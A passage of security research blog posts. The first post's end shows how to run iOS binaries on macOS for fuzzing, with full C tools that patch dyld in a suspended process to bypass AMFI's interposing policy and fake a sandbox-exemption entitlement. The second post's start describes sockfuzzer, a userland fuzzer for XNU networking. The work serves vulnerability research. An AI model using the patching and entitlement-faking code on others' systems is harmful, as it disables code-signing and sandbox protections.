    frame #9: dyld`...

    frame #10: dyld`dyld::_main

    frame #11: dyld`dyldbootstrap::start

    frame #12: dyld`_dyld_start + 56

As a side note, logic like the above will turn out to be a somewhat common theme: various components responsible for the runtime environment will have special handling for iOS binaries, in which case they tend to enforce various policies more aggressively.

One possible way to solve this would be to sign the iOS binary with a self-signed (and locally trusted) code signing certificate and granting it the “com.apple.private.security.no-sandbox” entitlement. This would then cause libsystem_secinit to not attempt to initialize the app sandbox. Unfortunately, it seems that while AppleMobileFileIntegrity (“amfi” - the OS component implementing various security policies like entitlement and code signing checks) will allow macOS binaries to be signed by locally-trusted code-signing certificates if SIP is disabled, it will not do so for iOS binaries. Instead, it appears to enforce roughly the same requirements as on iOS, namely that the binary must either be signed by Apple directly (in case the app is downloaded from the app store) or there must exist a valid (i.e. one signed by Apple) provisioning profile for the code-signing entity which explicitly allows the entitlements. As such, this path appears like a dead end.

Another way to work around the sandbox initialization would be to use dyld interposing to replace xpc_copy_entitlements_for_self, which libsystem_secinit invokes to obtain the process’ entitlements, with another function that would simply return the “com.apple.private.security.no-sandbox” entitlement. This would in turn prevent libsystem_secinit from attempting to initialize the sandbox.

Unfortunately, the iOS process is subject to further restrictions, likely part of the “hardened runtime” suite, which causes dyld to disable library interposing (some more information on this mechanism is available here). This policy is also implemented by amfi, in AppleMobileFileIntegrity.kext (the kernel component of amfi):

__int64 __fastcall macos_dyld_policy_library_interposing(proc *a1, int *a2)

{

  int v3; // w8

  v3 = *a2;

  ...

  if ( (v3 & 0x10400) == 0x10000 )   // flag is set for iOS binaries

  {

    logDyldPolicyRejection(a1, "library interposing", "Denying library interposing for iOS app\n");

    return 0LL;

  }

  return 64LL;

}

As can be seen, AMFI will deny library interposing for all iOS binaries. Unfortunately, I couldn’t come up with a better solution for this than to patch the code of dyld at runtime to ignore AMFI’s policy decision and thus allow library interposing. Fortunately though, doing lightweight runtime code patching is fairly easy through the use of some classic mach APIs:

  1. Find the offset of _amfi_check_dyld_policy_self in /usr/lib/dyld, e.g. with nm(1)
  2. Start the iOS process with the POSIX_SPAWN_START_SUSPENDED attribute so it is initially suspended (the equivalent of SIGSTOP). At this point, only dyld and the binary itself will have been mapped into the process’ memory space by the kernel.
  3. “Attach” to the process using task_for_pid
  4. Find the location of dyld in memory through vm_region_recurse_64
  5. Map dyld’s code section writable using vm_protect(VM_PROT_READ | VM_PROT_WRITE | VM_PROT_COPY) (where VM_PROT_COPY is seemingly necessary to force the pages to be copied since they are shared)
  6. Patch  _amfi_check_dyld_policy_self through vm_write to simply return 0x5f (indicating that dyld interposing and other features should be allowed)
  7. Map dyld’s code section executable again

To be able to use the task_for_pid trap, the runner binary will either need the “com.apple.security.cs.debugger” entitlement or root privileges. However, as the runner is a macOS binary, it can be given this entitlement through a self-signed certificate which amfi will then allow.

As such, the full steps necessary to launch an iOS binary on macOS are:

  1. Use the posix_spawnattr_set_platform_np API to set the target platform to PLATFORM_IOS
  2. Execute the new process via posix_spawn(2) and start it suspended
  3. Patch dyld to allow library interposing
  4. In the interposed library, claim to possess the com.apple.security.cs.debugger entitlement by replacing xpc_copy_entitlements_for_self
  5. Continue the process by sending it SIGCONT

This can now be seen in action:

> cat hello.c

#include <stdio.h>

int main() {

    puts("Hello from an iOS binary!");

    return 0;

}

> clang -arch arm64 hello.c -o hello -isysroot \

/Applications/Xcode.app/Contents/Developer/Platforms/iPhoneOS.platform/Developer/SDKs/iPhoneOS.sdk interpose.dylib

> ./runner hello

[*] Preparing to execute iOS binary hello

[+] Child process created with pid: 48302

[*] Patching child process to allow dyld interposing...

[*] _amfi_check_dyld_policy_self at offset 0x54d94 in /usr/lib/dyld

[*] /usr/lib/dyld mapped at 0x1049ec000

[+] Successfully patched _amfi_check_dyld_policy_self

[*] Sending SIGCONT to continue child

[*] Faking no-sandbox entitlement in xpc_copy_entitlements_for_self

Hello from an iOS binary!

[*] Child exited with status 0

Fuzzing

With the ability to launch iOS processes, it now becomes possible to fuzz existing iOS code natively on macOS as well. I decided to use Honggfuzz for a simple PoC of this that also used lightweight coverage guidance (based on the Trapfuzz instrumentation approach). The main issue with this approach is that honggfuzz uses the combination of fork(2) followed by execve(2) to create the child processes, while also performing various operations, such as dup2’ing file descriptors, setting environment variables, etc after forking but before exec’ing. However, the iOS binary must be executed through posix_spawn, which means that these operations must be performed at some other time. Furthermore, as honggfuzz itself is still compiled for macOS, some steps of the compilation of the target binary will fail (they will attempt to link previously compiled .o files, but now the platform no longer matches) and so have to be replaced. There are certainly better ways to do this (and I encourage the reader to implement it properly), but this was the approach that I got to work the quickest.

The hacky proof-of-concept patch for honggfuzz can be found here. In addition to building honggfuzz for arm64, the honggfuzz binary is subsequently signed and given the “com.apple.security.cs.debugger” entitlement in order for task_for_pid to work.

Conclusion

This blog post discussed how iOS apps are run on macOS and how that functionality can be used to execute any code compiled for iOS natively on macOS. This in turn can facilitate dynamic analysis and fuzzing of iOS code, and thus might make the platform a tiny bit more open for security researchers.

 

Attachment 1: runner.c

// clang -o runner runner.c

// cat <<EOF > entitlements.xml

// <?xml version="1.0" encoding="UTF-8"?>

// <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd"\>

// <plist version="1.0">

// <dict>

//     <key>com.apple.security.cs.debugger</key>

//     <true/>

// </dict>

// </plist>

// EOF

// # Find available code signing identities using `security find-identity`

// codesign -s "$IDENTITY" --entitlements entitlements.xml runner

//

#include <stdlib.h>

#include <stdio.h>

#include <string.h>

#include <dlfcn.h>

#include <signal.h>

#include <unistd.h>

#include <spawn.h>

#include <sys/wait.h>

#include <mach/mach_init.h>

#include <mach/vm_map.h>

#include <mach/vm_page_size.h>

#define page_align(addr) (vm_address_t)((uintptr_t)(addr) & (~(vm_page_size - 1)))

#define PLATFORM_IOS 2

extern char **environ;

extern int posix_spawnattr_set_platform_np(posix_spawnattr_t*, int, int);

void instrument(pid_t pid) {

    kern_return_t kr;

    task_t task;

    puts("[*] Patching child process to allow dyld interposing...");

    // Find patch point

    FILE* output = popen("nm -arch arm64e /usr/lib/dyld  | grep _amfi_check_dyld_policy_self", "r");

    unsigned int patch_offset;

    int r = fscanf(output, "%x t _amfi_check_dyld_policy_self", &patch_offset);

    if (r != 1) {

        printf("Failed to find offset of _amfi_check_dyld_policy_self in /usr/lib/dyld\n");

        return;

    }

    printf("[*] _amfi_check_dyld_policy_self at offset 0x%x in /usr/lib/dyld\n", patch_offset);

   

    // Attach to the target process

    kr = task_for_pid(mach_task_self(), pid, &task);

    if (kr != KERN_SUCCESS) {

        printf("task_for_pid failed. Is this binary signed and possesses the com.apple.security.cs.debugger entitlement?\n");

        return;

    }

    vm_address_t dyld_addr = 0;

    int headers_found = 0;

    vm_address_t addr = 0;

    vm_size_t size;

    vm_region_submap_info_data_64_t info;

    mach_msg_type_number_t info_count = VM_REGION_SUBMAP_INFO_COUNT_64;

    unsigned int depth = 0;

    while (1) {

        // get next memory region

        kr = vm_region_recurse_64(task, &addr, &size, &depth, (vm_region_info_t)&info, &info_count);

        if (kr != KERN_SUCCESS)

            break;

        unsigned int header;

        vm_size_t bytes_read;

        kr = vm_read_overwrite(task, addr, 4, (vm_address_t)&header, &bytes_read);

        if (kr != KERN_SUCCESS) {

            // TODO handle this, some mappings are probably just not readable

            printf("vm_read_overwrite failed\n");

            return;

        }

        if (bytes_read != 4) {

            // TODO handle this properly

            printf("[-] vm_read read to few bytes\n");

            return;

        }

        if (header == 0xfeedfacf) {

            headers_found++;

        }

        if (headers_found == 2) {

            // This is dyld

            dyld_addr = addr;

            break;

        }

        addr += size;

    }

    if (dyld_addr == 0) {

        printf("[-] Failed to find /usr/lib/dyld\n");

        return;

    }

    printf("[*] /usr/lib/dyld mapped at 0x%lx\n", dyld_addr);

    vm_address_t patch_addr = dyld_addr + patch_offset;

    // VM_PROT_COPY forces COW, probably, see vm_map_protect in vm_map.c

    kr = vm_protect(task, page_align(patch_addr), vm_page_size, false, VM_PROT_READ | VM_PROT_WRITE | VM_PROT_COPY);

    if (kr != KERN_SUCCESS) {

        printf("vm_protect failed\n");

        return;

    }

   

    // MOV X8, 0x5f

    // STR X8, [X1]

    // RET

    const char* code = "\xe8\x0b\x80\xd2\x28\x00\x00\xf9\xc0\x03\x5f\xd6";

    kr = vm_write(task, patch_addr, (vm_offset_t)code, 12);

    if (kr != KERN_SUCCESS) {

        printf("vm_write failed\n");

        return;

    }

    kr = vm_protect(task, page_align(patch_addr), vm_page_size, false, VM_PROT_READ | VM_PROT_EXECUTE);

    if (kr != KERN_SUCCESS) {

        printf("vm_protect failed\n");

        return;

    }

    puts("[+] Successfully patched _amfi_check_dyld_policy_self");

}

int run(const char** argv) {

    pid_t pid;

    int rv;

    posix_spawnattr_t attr;

    rv = posix_spawnattr_init(&attr);

    if (rv != 0) {

        perror("posix_spawnattr_init");

        return -1;

    }

    rv = posix_spawnattr_setflags(&attr, POSIX_SPAWN_START_SUSPENDED);

    if (rv != 0) {

        perror("posix_spawnattr_setflags");

        return -1;

    }

    rv = posix_spawnattr_set_platform_np(&attr, PLATFORM_IOS, 0);

    if (rv != 0) {

        perror("posix_spawnattr_set_platform_np");

        return -1;

    }

    rv = posix_spawn(&pid, argv[0], NULL, &attr, argv, environ);

    if (rv != 0) {

        perror("posix_spawn");

        return -1;

    }

    printf("[+] Child process created with pid: %i\n", pid);

    instrument(pid);

    printf("[*] Sending SIGCONT to continue child\n");

    kill(pid, SIGCONT);

    int status;

    rv = waitpid(pid, &status, 0);

    if (rv == -1) {

         perror("waitpid");

        return -1;

    }

    printf("[*] Child exited with status %i\n", status);

    posix_spawnattr_destroy(&attr);

    return 0;

}

int main(int argc, char* argv[]) {

    if (argc <= 1) {

        printf("Usage: %s path/to/ios_binary\n", argv[0]);

        return 0;

    }

    printf("[*] Preparing to execute iOS binary %s\n", argv[1]);

    return run(argv + 1);

}

Attachment 2: interpose.c

// clang interpose.c -arch arm64 -o interpose.dylib -shared -isysroot /Applications/Xcode.app/Contents/Developer/Platforms/iPhoneOS.platform/Developer/SDKs/iPhoneOS.sdk

#include <stdio.h>

#include <unistd.h>

typedef void* xpc_object_t;

extern xpc_object_t xpc_dictionary_create(void*, void*, int);

extern void xpc_dictionary_set_value(xpc_object_t, const char*, xpc_object_t);

extern xpc_object_t xpc_bool_create(int);

extern xpc_object_t xpc_copy_entitlements_for_self();

// From https://opensource.apple.com/source/dyld/dyld-97.1/include/mach-o/dyld-interposing.h.auto.html

/*

 *  Example:

 *

 *  static

 *  int

 *  my_open(const char* path, int flags, mode_t mode)

 *  {

 *    int value;

 *    // do stuff before open (including changing the arguments)

 *    value = open(path, flags, mode);

 *    // do stuff after open (including changing the return value(s))

 *    return value;

 *  }

 *  DYLD_INTERPOSE(my_open, open)

 */

#define DYLD_INTERPOSE(_replacment,_replacee) \

   __attribute__((used)) static struct{ const void* replacment; const void* replacee; } _interpose_##_replacee \

            __attribute__ ((section ("__DATA,__interpose"))) = { (const void*)(unsigned long)&_replacment, (const void*)(unsigned long)&_replacee };

xpc_object_t my_xpc_copy_entitlements_for_self() {

    puts("[*] Faking com.apple.private.security.no-sandbox entitlement in interposed xpc_copy_entitlements_for_self");

    xpc_object_t dict = xpc_dictionary_create(NULL, NULL, 0);

    xpc_dictionary_set_value(dict, "com.apple.private.security.no-sandbox", xpc_bool_create(1));

    return dict;

}

DYLD_INTERPOSE(my_xpc_copy_entitlements_for_self, xpc_copy_entitlements_for_self);

Designing sockfuzzer, a network syscall fuzzer for XNU

Posted by Ned Williamson, Project Zero

Introduction

When I started my 20% project – an initiative where employees are allocated twenty-percent of their paid work time to pursue personal projects –  with Project Zero, I wanted to see if I could apply the techniques I had learned fuzzing Chrome to XNU, the kernel used in iOS and macOS. My interest was sparked after learning some prominent members of the iOS research community believed the kernel was “fuzzed to death,” and my understanding was that most of the top researchers used auditing for vulnerability research. This meant finding new bugs with fuzzing would be meaningful in demonstrating the value of implementing newer fuzzing techniques. In this project, I pursued a somewhat unusual approach to fuzz XNU networking in userland by converting it into a library, “booting” it in userspace and using my standard fuzzing workflow to discover vulnerabilities. Somewhat surprisingly, this worked well enough to reproduce some of my peers’ recent discoveries and report some of my own, one of which was a reliable privilege escalation from the app context, CVE-2019-8605, dubbed “SockPuppet.” I’m excited to open source this fuzzing project, “sockfuzzer,” for the community to learn from and adapt. In this post, we’ll do a deep dive into its design and implementation.

Attack Surface Review and Target Planning

Choosing Networking

We’re at the beginning of a multistage project. I had enormous respect for the difficulty of the task ahead of me. I knew I would need to be careful investing time at each stage of the process, constantly looking for evidence that I needed to change direction. The first big decision was to decide what exactly we wanted to target.

I started by downloading the XNU sources and reviewing them, looking for areas that handled a lot of attacker-controlled input and seemed amenable to fuzzing – immediately the networking subsystem jumped out as worthy of research. I had just exploited a Chrome sandbox bug that leveraged collaboration between an exploited renderer process and a server working in concert. I recognized these attack surfaces’ power, where some security-critical code is “sandwiched” between two attacker-controlled entities. The Chrome browser process is prone to use after free vulnerabilities due to the difficulty of managing state for large APIs, and I suspected XNU would have the same issue. Networking features both parsing and state management. I figured that even if others had already fuzzed the parsers extensively, there could still be use after free vulnerabilities lying dormant.

I then proceeded to look at recent bug reports. Two bugs that caught my eye: the mptcp overflow discovered by Ian Beer and the ICMP out of bounds write found by Kevin Backhouse. Both of these are somewhat “straightforward” buffer overflows. The bugs’ simplicity hinted that kernel networking, even packet parsing, was sufficiently undertested. A fuzzer combining network syscalls and arbitrary remote packets should be large enough in scope to reproduce these issues and find new ones.

Digging deeper, I wanted to understand how to reach these bugs in practice. By cross-referencing the functions and setting kernel breakpoints in a VM, I managed to get a more concrete idea. Here’s the call stack for Ian’s MPTCP bug:

The buggy function in question is mptcp_usr_connectx. Moving up the call stack, we find the connectx syscall, which we see in Ian’s original testcase. If we were to write a fuzzer to find this bug, how would we do it? Ultimately, whatever we do has to both find the bug and give us the information we need to reproduce it on the real kernel. Calling mptcp_usr_connectx directly should surely find the bug, but this seems like the wrong idea because it takes a lot of arguments. Modeling a fuzzer well enough to call this function directly in a way representative of the real code is no easier than auditing the code in the first place, so we’ve not made things any easier by writing a targeted fuzzer. It’s also wasted effort to write a target for each function this small. On the other hand, the further up the call stack we go, the more complexity we may have to support and the less chance we have of landing on the bug. If I were trying to unit test the networking stack, I would probably avoid the syscall layer and call the intermediate helper functions as a middle ground. This is exactly what I tried in the first draft of the fuzzer; I used sock_socket to create struct socket* objects to pass to connectitx in the hopes that it would be easy to reproduce this bug while being high-enough level that this bug could plausibly have been discovered without knowing where to look for it. Surprisingly, after some experimentation, it turned out to be easier to simply call the syscalls directly (via connectx). This makes it easier to translate crashing inputs into programs to run against a real kernel since testcases map 1:1 to syscalls. We’ll see more details about this later.

We can’t test networking properly without accounting for packets. In this case, data comes from the hardware, not via syscalls from a user process. We’ll have to expose this functionality to our fuzzer. To figure out how to extend our framework to support random packet delivery, we can use our next example bug. Let’s take a look at the call stack for delivering a packet to trigger the ICMP bug reported by Kevin Backhouse:

To reach the buggy function, icmp_error, the call stack is deeper, and unlike with syscalls, it’s not immediately obvious which of these functions we should call to cover the relevant code. Starting from the very top of the call stack, we see that the crash occurred in a kernel thread running the dlil_input_thread_func function. DLIL stands for Data Link Interface Layer, a reference to the OSI model’s data link layer. Moving further down the stack, we see ether_inet_input, indicating an Ethernet packet (since I tested this issue using Ethernet). We finally make it down to the IP layer, where ip_dooptions signals an icmp_error. As an attacker, we probably don’t have a lot of control over the interface a user uses to receive our input, so we can rule out some of the uppermost layers. We also don’t want to deal with threads in our fuzzer, another design tradeoff we’ll describe in more detail later. proto_input and ip_proto_input don’t do much, so I decided that ip_proto was where I would inject packets, simply by calling the function when I wanted to deliver a packet. After reviewing proto_register_input, I discovered another function called ip6_input, which was the entry point for the IPv6 code. Here’s the prototype for ip_input:

void ip_input(struct mbuf *m);


Mbufs are message buffers, a standard buffer format used in network stacks. They enable multiple small packets to be chained together through a linked list. So we just need to generate mbufs with random data before calling
ip_input.

I was surprised by how easy it was to work with the network stack compared to the syscall interface. `ip_input` and `ip6_input` pure functions that don’t require us to know any state to call them. But stepping back, it made more sense. Packet delivery is inherently a clean interface: our kernel has no idea what arbitrary packets may be coming in, so the interface takes a raw packet and then further down in the stack decides how to handle it. Many packets contain metadata that affect the kernel state once received. For example, TCP or UDP packets will be matched to an existing connection by their port number.

Most modern coverage guided fuzzers, including this LibFuzzer-based project, use a design inspired by AFL. When a test case with some known coverage is mutated and the mutant produces coverage that hasn’t been seen before, the mutant is added to the current corpus of inputs. It becomes available for further mutations to produce even deeper coverage. Lcamtuf, the author of AFL, has an excellent demonstration of how this algorithm created JPEGs using coverage feedback with no well-formed starting samples. In essence, most poorly-formed inputs are rejected early. When a mutated input passes a validation check, the input is saved. Then that input can be mutated until it manages to pass the second validation check, and so on. This hill climbing algorithm has no problem generating dependent sequences of API calls, in this case to interleave syscalls with ip_input and ip6_input. Random syscalls can get the kernel into some state where it’s expecting a packet. Later, when libFuzzer guesses a packet that gets the kernel into some new state, the hill climbing algorithm will record a new test case when it sees new coverage. Dependent sequences of syscalls and packets are brute-forced in a linear fashion, one call at a time.

Designing for (Development) Speed

Now that we know where to attack this code base, it’s a matter of building out the fuzzing research platform. I like thinking of it this way because it emphasizes that this fuzzer is a powerful assistant to a researcher, but it can’t do all the work. Like any other test framework, it empowers the researcher to make hypotheses and run experiments over code that looks buggy. For the platform to be helpful, it needs to be comfortable and fun to work with and get out of the way.

When it comes to standard practice for kernel fuzzing, there’s a pretty simple spectrum for strategies. On one end, you fuzz self-contained functions that are security-critical, e.g., OSUnserializeBinary. These are easy to write and manage and are generally quite performant. On the other end, you have “end to end” kernel testing that performs random syscalls against a real kernel instance. These heavyweight fuzzers have the advantage of producing issues that you know are actionable right away, but setup and iterative development are slower. I wanted to try a hybrid approach that could preserve some of the benefits of each style. To do so, I would port the networking stack of XNU out of the kernel and into userland while preserving as much of the original code as possible. Kernel code can be surprisingly portable and amenable to unit testing, even when run outside its natural environment.

There has been a push to add more user-mode unit testing to Linux. If you look at the documentation for Linux’s KUnit project, there’s an excellent quote from Linus Torvalds: “… a lot of people seem to think that performance is about doing the same thing, just doing it faster, and that is not true. That is not what performance is all about. If you can do something really fast, really well, people will start using it differently.” This statement echoes the experience I had writing targeted fuzzers for code in Chrome’s browser process. Due to extensive unit testing, Chrome code is already well-factored for fuzzing. In a day’s work, I could try out many iterations of a fuzz target and the edit/build/run cycle. I didn’t have a similar mechanism out of the box with XNU. In order to perform a unit test, I would need to rebuild the kernel. And despite XNU being considerably smaller than Chrome, incremental builds were slower due to the older kmk build system. I wanted to try bridging this gap for XNU.

Setting up the Scaffolding

“Unit” testing a kernel up through the syscall layer sounds like a big task, but it’s easier than you’d expect if you forgo some complexity. We’ll start by building all of the individual kernel object files from source using the original build flags. But instead of linking everything together to produce the final kernel binary, we link in only the subset of objects containing code in our target attack surface. We then stub or fake the rest of the functionality. Thanks to the recon in the previous section, we already know which functions we want to call from our fuzzer. I used that information to prepare a minimal list of source objects to include in our userland port.

Before we dive in, let’s define the overall structure of the project as pictured below. There’s going to be a fuzz target implemented in C++ that translates fuzzed inputs into interactions with the userland XNU library. The target code, libxnu, exposes a few wrapper symbols for syscalls and ip_input as mentioned in the attack surface review section. The fuzz target also exposes its random sequence of bytes to kernel APIs such as copyin or copyout, whose implementations have been replaced with fakes that use fuzzed input data.

To make development more manageable, I decided to create a new build system using CMake, as it supported Ninja for fast rebuilds. One drawback here is the original build system has to be run every time upstream is updated to deal with generated sources, but this is worth it to get a faster development loop. I captured all of the compiler invocations during a normal kernel build and used those to reconstruct the flags passed to build the various kernel subsystems. Here’s what that first pass looks like:

project(libxnu)

set(XNU_DEFINES

    -DAPPLE

    -DKERNEL

    # ...

)

set(XNU_SOURCES

    bsd/conf/param.c

    bsd/kern/kern_asl.c

    bsd/net/if.c

    bsd/netinet/ip_input.c

    # ...

)

add_library(xnu SHARED ${XNU_SOURCES} ${FUZZER_FILES} ${XNU_HEADERS})

protobuf_generate_cpp(NET_PROTO_SRCS NET_PROTO_HDRS fuzz/net_fuzzer.proto)

add_executable(net_fuzzer fuzz/net_fuzzer.cc ${NET_PROTO_SRCS} ${NET_PROTO_HDRS})

target_include_directories(net_fuzzer PRIVATE libprotobuf-mutator)

target_compile_options(net_fuzzer PRIVATE ${FUZZER_CXX_FLAGS})


Of course, without the rest of the kernel, we see tons of missing symbols.

  "_zdestroy", referenced from:

      _if_clone_detach in libxnu.a(if.c.o)

  "_zfree", referenced from:

      _kqueue_destroy in libxnu.a(kern_event.c.o)

      _knote_free in libxnu.a(kern_event.c.o)

      _kqworkloop_get_or_create in libxnu.a(kern_event.c.o)

      _kev_delete in libxnu.a(kern_event.c.o)

      _pipepair_alloc in libxnu.a(sys_pipe.c.o)

      _pipepair_destroy_pipe in libxnu.a(sys_pipe.c.o)

      _so_cache_timer in libxnu.a(uipc_socket.c.o)

      ...

  "_zinit", referenced from:

      _knote_init in libxnu.a(kern_event.c.o)

      _kern_event_init in libxnu.a(kern_event.c.o)

      _pipeinit in libxnu.a(sys_pipe.c.o)

      _socketinit in libxnu.a(uipc_socket.c.o)

      _unp_init in libxnu.a(uipc_usrreq.c.o)

      _cfil_init in libxnu.a(content_filter.c.o)

      _tcp_init in libxnu.a(tcp_subr.c.o)

      ...

  "_zone_change", referenced from:

      _knote_init in libxnu.a(kern_event.c.o)

      _kern_event_init in libxnu.a(kern_event.c.o)

      _socketinit in libxnu.a(uipc_socket.c.o)

      _cfil_init in libxnu.a(content_filter.c.o)

      _tcp_init in libxnu.a(tcp_subr.c.o)

      _ifa_init in libxnu.a(if.c.o)

      _if_clone_attach in libxnu.a(if.c.o)

      ...

ld: symbol(s) not found for architecture x86_64

clang: error: linker command failed with exit code 1 (use -v to see invocation)

ninja: build stopped: subcommand failed.


To get our initial targeted fuzzer working, we can do a simple trick by linking against a file containing stubbed implementations of all of these. We take advantage of C’s weak type system here. For each function we need to implement, we can link an implementation
void func() { assert(false); }. The arguments passed to the function are simply ignored, and a crash will occur whenever the target code attempts to call it. This goal can be achieved with linker flags, but it was a simple enough solution that allowed me to get nice backtraces when I hit an unimplemented function.

// Unimplemented stub functions

// These should be replaced with real or mock impls.

#include <kern/assert.h>

#include <stdbool.h>

int printf(const char* format, ...);

void Assert(const char* file, int line, const char* expression) {

  printf("%s: assert failed on line %d: %s\n", file, line, expression);

  __builtin_trap();

}

void IOBSDGetPlatformUUID() { assert(false); }

void IOMapperInsertPage() { assert(false); }

// ...


Then we just link this file into the XNU library we’re building by adding it to the source list:

set(XNU_SOURCES

    bsd/conf/param.c

    bsd/kern/kern_asl.c

    # ...

    fuzz/syscall_wrappers.c

    fuzz/ioctl.c

    fuzz/backend.c

    fuzz/stubs.c

    fuzz/fake_impls.c


As you can see, there are some other files I included in the XNU library that represent faked implementations and helper code to expose some internal kernel APIs. To make sure our fuzz target will call code in the linked library, and not some other host functions (syscalls) with a clashing name, we hide all of the symbols in
libxnu by default and then expose a set of wrappers that call those functions on our behalf. I hide all the names by default using a CMake setting set_target_properties(xnu PROPERTIES C_VISIBILITY_PRESET hidden). Then we can link in a file (fuzz/syscall_wrappers.c) containing wrappers like the following:

__attribute__((visibility("default"))) int accept_wrapper(int s, caddr_t name,

                                                          socklen_t* anamelen,

                                                          int* retval) {

  struct accept_args uap = {

      .s = s,

      .name = name,

      .anamelen = anamelen,

  };

  return accept(kernproc, &uap, retval);

}

Note the visibility attribute that explicitly exports the symbol from the library. Due to the simplicity of these wrappers I created a script to automate this called generate_fuzzer.py using syscalls.master.

With the stubs in place, we can start writing a fuzz target now and come back to deal with implementing them later. We will see a crash every time the target code attempts to use one of the functions we initially left out. Then we get to decide to either include the real implementation (and perhaps recursively require even more stubbed function implementations) or to fake the functionality.

A bonus of getting a build working with CMake was to create multiple targets with different instrumentation. Doing so allows me to generate coverage reports using clang-coverage:

target_compile_options(xnu-cov PRIVATE ${XNU_C_FLAGS} -DLIBXNU_BUILD=1 -D_FORTIFY_SOURCE=0 -fprofile-instr-generate -fcoverage-mapping)


With that, we just add a fuzz target file and a protobuf file to use with protobuf-mutator and we’re ready to get started:

protobuf_generate_cpp(NET_PROTO_SRCS NET_PROTO_HDRS fuzz/net_fuzzer.proto)

add_executable(net_fuzzer fuzz/net_fuzzer.cc ${NET_PROTO_SRCS} ${NET_PROTO_HDRS})

target_include_directories(net_fuzzer PRIVATE libprotobuf-mutator)

target_compile_options(net_fuzzer

                       PRIVATE -g

                               -std=c++11

                               -Werror

                               -Wno-address-of-packed-member

                               ${FUZZER_CXX_FLAGS})

if(APPLE)

target_link_libraries(net_fuzzer ${FUZZER_LD_FLAGS} xnu fuzzer protobuf-mutator ${Protobuf_LIBRARIES})

else()

target_link_libraries(net_fuzzer ${FUZZER_LD_FLAGS} xnu fuzzer protobuf-mutator ${Protobuf_LIBRARIES} pthread)

endif(APPLE)

Writing a Fuzz Target

At this point, we’ve assembled a chunk of XNU into a convenient library, but we still need to interact with it by writing a fuzz target. At first, I thought I might write many targets for different features, but I decided to write one monolithic target for this project. I’m sure fine-grained targets could do a better job for functionality that’s harder to fuzz, e.g., the TCP state machine, but we will stick to one for simplicity.

We’ll start by specifying an input grammar using protobuf, part of which is depicted below. This grammar is completely arbitrary and will be used by a corresponding C++ harness that we will write next. LibFuzzer has a plugin called libprotobuf-mutator that knows how to mutate protobuf messages. This will enable us to do grammar-based mutational fuzzing efficiently, while still leveraging coverage guided feedback. This is a very powerful combination.

message Socket {

  required Domain domain = 1;

  required SoType so_type = 2;

  required Protocol protocol = 3;

  // TODO: options, e.g. SO_ACCEPTCONN

}

message Close {

  required FileDescriptor fd = 1;

}

message SetSocketOpt {

  optional Protocol level = 1;

  optional SocketOptName name = 2;

  // TODO(nedwill): structure for val

  optional bytes val = 3;

  optional FileDescriptor fd = 4;

}

message Command {

  oneof command {

    Packet ip_input = 1;

    SetSocketOpt set_sock_opt = 2;

    Socket socket = 3;

    Close close = 4;

  }

}

message Session {

  repeated Command commands = 1;

  required bytes data_provider = 2;

}

I left some TODO comments intact so you can see how the grammar can always be improved. As I’ve done in similar fuzzing projects, I have a top-level message called Session that encapsulates a single fuzzer iteration or test case. This session contains a sequence of “commands” and a sequence of bytes that can be used when random, unstructured data is needed (e.g., when doing a copyin). Commands are syscalls or random packets, which in turn are their own messages that have associated data. For example, we might have a session that has a single Command message containing a “Socket” message. That Socket message has data associated with each argument to the syscall. In our C++-based target, it’s our job to translate messages of this custom specification into real syscalls and related API calls. We inform libprotobuf-mutator that our fuzz target expects to receive one “Session” message at a time via the macro DEFINE_BINARY_PROTO_FUZZER.

DEFINE_BINARY_PROTO_FUZZER(const Session &session) {

// ...

  std::set<int> open_fds;

  for (const Command &command : session.commands()) {

    int retval = 0;

    switch (command.command_case()) {

      case Command::kSocket: {

        int fd = 0;

        int err = socket_wrapper(command.socket().domain(),

                                 command.socket().so_type(),

                                 command.socket().protocol(), &fd);

        if (err == 0) {

          // Make sure we're tracking fds properly.

          if (open_fds.find(fd) != open_fds.end()) {

            printf("Found existing fd %d\n", fd);

            assert(false);

          }

          open_fds.insert(fd);

        }

        break;

      }

      case Command::kClose: {

        open_fds.erase(command.close().fd());

        close_wrapper(command.close().fd(), nullptr);

        break;

      }

      case Command::kSetSockOpt: {

        int s = command.set_sock_opt().fd();

        int level = command.set_sock_opt().level();

        int name = command.set_sock_opt().name();

        size_t size = command.set_sock_opt().val().size();

        std::unique_ptr<char[]> val(new char[size]);

        memcpy(val.get(), command.set_sock_opt().val().data(), size);

        setsockopt_wrapper(s, level, name, val.get(), size, nullptr);

        break;

      }

While syscalls are typically a straightforward translation of the protobuf message, other commands are more complex. In order to improve the structure of randomly generated packets, I added custom message types that I then converted into the relevant on-the-wire structure before passing it into ip_input. Here’s how this looks for TCP:

message Packet {

  oneof packet {

    TcpPacket tcp_packet = 1;

  }

}

message TcpPacket {

  required IpHdr ip_hdr = 1;

  required TcpHdr tcp_hdr = 2;

  optional bytes data = 3;

}

message IpHdr {

  required uint32 ip_hl = 1;

  required IpVersion ip_v = 2;

  required uint32 ip_tos = 3;

  required uint32 ip_len = 4;

  required uint32 ip_id = 5;

  required uint32 ip_off = 6;

  required uint32 ip_ttl = 7;

  required Protocol ip_p = 8;

  required InAddr ip_src = 9;

  required InAddr ip_dst = 10;

}

message TcpHdr {

  required Port th_sport = 1;

  required Port th_dport = 2;

  required TcpSeq th_seq = 3;

  required TcpSeq th_ack = 4;

  required uint32 th_off = 5;

  repeated TcpFlag th_flags = 6;

  required uint32 th_win = 7;

  required uint32 th_sum = 8;

  required uint32 th_urp = 9;

  // Ned's extensions

  required bool is_pure_syn = 10;

  required bool is_pure_ack = 11;

}

Unfortunately, protobuf doesn’t support a uint8 type, so I had to use uint32 for some fields. That’s some lost fuzzing performance. You can also see some synthetic TCP header flags I added to make certain flag combinations more likely: is_pure_syn and is_pure_ack. Now I have to write some code to stitch together a valid packet from these nested fields. Shown below is the code to handle just the TCP header.

std::string get_tcp_hdr(const TcpHdr &hdr) {

  struct tcphdr tcphdr = {

      .th_sport = (unsigned short)hdr.th_sport(),

      .th_dport = (unsigned short)hdr.th_dport(),

      .th_seq = __builtin_bswap32(hdr.th_seq()),

      .th_ack = __builtin_bswap32(hdr.th_ack()),

      .th_off = hdr.th_off(),

      .th_flags = 0,

      .th_win = (unsigned short)hdr.th_win(),

      .th_sum = 0, // TODO(nedwill): calculate the checksum instead of skipping it

      .th_urp = (unsigned short)hdr.th_urp(),

  };

  for (const int flag : hdr.th_flags()) {

    tcphdr.th_flags ^= flag;

  }

  // Prefer pure syn

  if (hdr.is_pure_syn()) {

